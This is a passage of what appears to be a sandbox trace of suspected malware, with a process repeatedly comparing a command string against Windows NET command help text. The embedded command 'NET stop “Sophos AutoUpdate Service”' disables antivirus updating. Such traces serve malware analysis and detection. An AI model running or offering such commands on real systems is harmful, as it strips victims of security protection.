lpSource=0x74680000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x16 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x11 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START RPCSS\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x14 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START SCHEDULE\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x12 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START SERVER\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xf [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START UPS\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x17 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START WORKSTATION\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x18 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x24) returned 14 [0114.968] LocalFree (hMem=0x415510) returned 0x0 [0114.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x2a [0114.968] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET STATISTICS\r\n[WORKSTATION | SERVE", _MaxCount=0x24) returned 14 [0114.968] LocalFree (hMem=0x415510) returned 0x0 [0114.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x15 [0114.968] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x24) returned 19 [0114.968] LocalFree (hMem=0x415510) returned 0x0 [0114.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x58 [0114.968] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAI", _MaxCount=0x24) returned -1 [0114.968] LocalFree (hMem=0x415510) returned 0x0 [0114.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x184 [0114.968] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET USE\r\n[devicename | *] [\\\\compute", _MaxCount=0x24) returned -2 [0114.968] LocalFree (hMem=0x415510) returned 0x0 [0114.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xc7 [0114.968] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET USER\r\n[username [password | *] [", _MaxCount=0x24) returned -2 [0114.968] LocalFree (hMem=0x415510) returned 0x0 [0114.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x47 [0114.968] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET VIEW\r\n[\\\\computername [/CACHE] |", _MaxCount=0x24) returned -3 [0114.968] LocalFree (hMem=0x415510) returned 0x0 [0114.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xc2 [0114.968] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CON", _MaxCount=0x24) returned 19 [0114.968] LocalFree (hMem=0x415510) returned 0x0 [0114.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x319 [0114.968] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="SERVICES\r\nNET START can be used to s", _MaxCount=0x24) returned -5 [0114.968] LocalFree (hMem=0x415510) returned 0x0 [0114.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x483 [0114.968] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="SYNTAX\r\nThe following conventions ar", _MaxCount=0x24) returned -5 [0114.968] LocalFree (hMem=0x415510) returned 0x0 [0114.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xa86 [0114.996] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NAMES\r\nThe following types of names ", _MaxCount=0x24) returned 4 [0114.996] LocalFree (hMem=0x415510) returned 0x0 [0114.996] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x54 [0114.996] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="\r\nFor more information on tools see ", _MaxCount=0x24) returned 97 [0114.996] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xad [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF", _MaxCount=0x1b) returned 18 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x2e [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET COMPUTER\r\n\\\\computernam", _MaxCount=0x1b) returned 16 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x7d [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET CONFIG SERVER\r\n[/AUTODI", _MaxCount=0x1b) returned 16 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x26 [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET CONFIG\r\n[SERVER | WORKS", _MaxCount=0x1b) returned 16 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x19 [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 16 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x1b [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1b) returned 13 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xbe [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET GROUP\r\n[groupname [/COM", _MaxCount=0x1b) returned 12 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x33 [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET HELP\r\ncommand\r\n -or", _MaxCount=0x1b) returned 11 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x19 [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1b) returned 11 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xc1 [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET LOCALGROUP\r\n[groupname ", _MaxCount=0x1b) returned 7 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x16 [0114.997] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 3 [0114.997] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x33 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET SESSION\r\n[\\\\computernam", _MaxCount=0x1b) returned 15 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x234 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1b) returned 12 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x13 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START BROWSER\r\n", _MaxCount=0x1b) returned 14 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x14 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1b) returned 14 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x14 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1b) returned 14 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x15 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START MESSENGER\r\n", _MaxCount=0x1b) returned 14 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x15 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START NET LOGON\r\n", _MaxCount=0x1b) returned 14 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x16 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1b) returned 14 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x11 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START RPCSS\r\n", _MaxCount=0x1b) returned 14 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x14 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1b) returned 14 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x12 [0114.998] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START SERVER\r\n", _MaxCount=0x1b) returned 14 [0114.998] LocalFree (hMem=0x415510) returned 0x0 [0114.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xf [0114.999] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START UPS\r\n", _MaxCount=0x1b) returned 14 [0114.999] LocalFree (hMem=0x415510) returned 0x0 [0114.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x17 [0114.999] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1b) returned 14 [0114.999] LocalFree (hMem=0x415510) returned 0x0 [0114.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x18 [0114.999] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1b) returned 14 [0114.999] LocalFree (hMem=0x415510) returned 0x0 [0114.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x2a [0114.999] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET STATISTICS\r\n[WORKSTATIO", _MaxCount=0x1b) returned 14 [0114.999] LocalFree (hMem=0x415510) returned 0x0 [0114.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x15 [0114.999] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 19 [0114.999] LocalFree (hMem=0x415510) returned 0x0 [0114.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x58 [0114.999] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET TIME\r\n\r\n[\\\\computername", _MaxCount=0x1b) returned -1 [0114.999] LocalFree (hMem=0x415510) returned 0x0 [0114.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x184 [0114.999] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET USE\r\n[devicename | *] [", _MaxCount=0x1b) returned -2 [0114.999] LocalFree (hMem=0x415510) returned 0x0 [0114.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xc7 [0114.999] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET USER\r\n[username [passwo", _MaxCount=0x1b) returned -2 [0114.999] LocalFree (hMem=0x415510) returned 0x0 [0114.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x47 [0114.999] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET VIEW\r\n[\\\\computername [", _MaxCount=0x1b) returned -3 [0114.999] LocalFree (hMem=0x415510) returned 0x0 [0114.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xc2 [0114.999] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NET\r\n [ ACCOUNTS | COMPU", _MaxCount=0x1b) returned 19 [0115.000] LocalFree (hMem=0x415510) returned 0x0 [0115.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x319 [0115.000] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="SERVICES\r\nNET START can be ", _MaxCount=0x1b) returned -5 [0115.000] LocalFree (hMem=0x415510) returned 0x0 [0115.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x483 [0115.000] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="SYNTAX\r\nThe following conve", _MaxCount=0x1b) returned -5 [0115.000] LocalFree (hMem=0x415510) returned 0x0 [0115.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xa86 [0115.000] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="NAMES\r\nThe following types ", _MaxCount=0x1b) returned 4 [0115.000] LocalFree (hMem=0x415510) returned 0x0 [0115.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x54 [0115.000] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate", _String2="\r\nFor more information on t", _MaxCount=0x1b) returned 97 [0115.000] LocalFree (hMem=0x415510) returned 0x0 [0115.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xad [0115.000] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET ACCOUNTS\r\n[/", _MaxCount=0x10) returned 18 [0115.000] LocalFree (hMem=0x415510) returned 0x0 [0115.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x2e [0115.000] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET COMPUTER\r\n\\\\", _MaxCount=0x10) returned 16 [0115.000] LocalFree (hMem=0x415510) returned 0x0 [0115.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x7d [0115.000] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET CONFIG SERVE", _MaxCount=0x10) returned 16 [0115.000] LocalFree (hMem=0x415510) returned 0x0 [0115.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x26 [0115.000] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET CONFIG\r\n[SER", _MaxCount=0x10) returned 16 [0115.000] LocalFree (hMem=0x415510) returned 0x0 [0115.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x19 [0115.000] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET CONTINUE\r\nse", _MaxCount=0x10) returned 16 [0115.001] LocalFree (hMem=0x415510) returned 0x0 [0115.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x1b [0115.001] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET FILE\r\n[id [/", _MaxCount=0x10) returned 13 [0115.001] LocalFree (hMem=0x415510) returned 0x0 [0115.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xbe [0115.001] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET GROUP\r\n[grou", _MaxCount=0x10) returned 12 [0115.001] LocalFree (hMem=0x415510) returned 0x0 [0115.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x33 [0115.001] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET HELP\r\ncomman", _MaxCount=0x10) returned 11 [0115.001] LocalFree (hMem=0x415510) returned 0x0 [0115.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x19 [0115.001] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET HELPMSG\r\nmes", _MaxCount=0x10) returned 11 [0115.001] LocalFree (hMem=0x415510) 